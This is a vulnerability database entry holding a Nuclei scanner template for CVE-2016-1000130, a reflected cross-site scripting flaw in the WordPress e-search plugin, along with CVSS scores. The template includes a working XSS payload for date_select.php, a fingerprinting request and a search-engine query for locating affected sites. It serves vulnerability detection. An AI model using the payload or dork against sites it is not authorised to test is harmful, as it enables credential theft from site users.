Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-1000130
HistoryJul 16, 2021 - 5:52 p.m.

WordPress e-search <=1.0 - Cross-Site Scripting

2021-07-1617:52:56
ProjectDiscovery
github.com
9

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

39.8%

Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2016-1000130

info:
  name: WordPress e-search <=1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.
  reference:
    - https://wordpress.org/plugins/e-search
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=394
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000130
    cwe-id: CWE-79
    epss-score: 0.00093
    epss-percentile: 0.38905
    cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "e-search_project"
    product: "e-search"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/e-search\""
  tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/e-search/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Search'
          - 'Tags:'
          - 'Tested up to:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a5288014858667d09cbe619d7031639a713b24df77e0dd22adbe3f10082fe61f02203f7217d1cb95de5df8854414c1c6cf7ea92ef16e8610c34b8551b657224844f3:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

39.8%

Related for NUCLEI:CVE-2016-1000130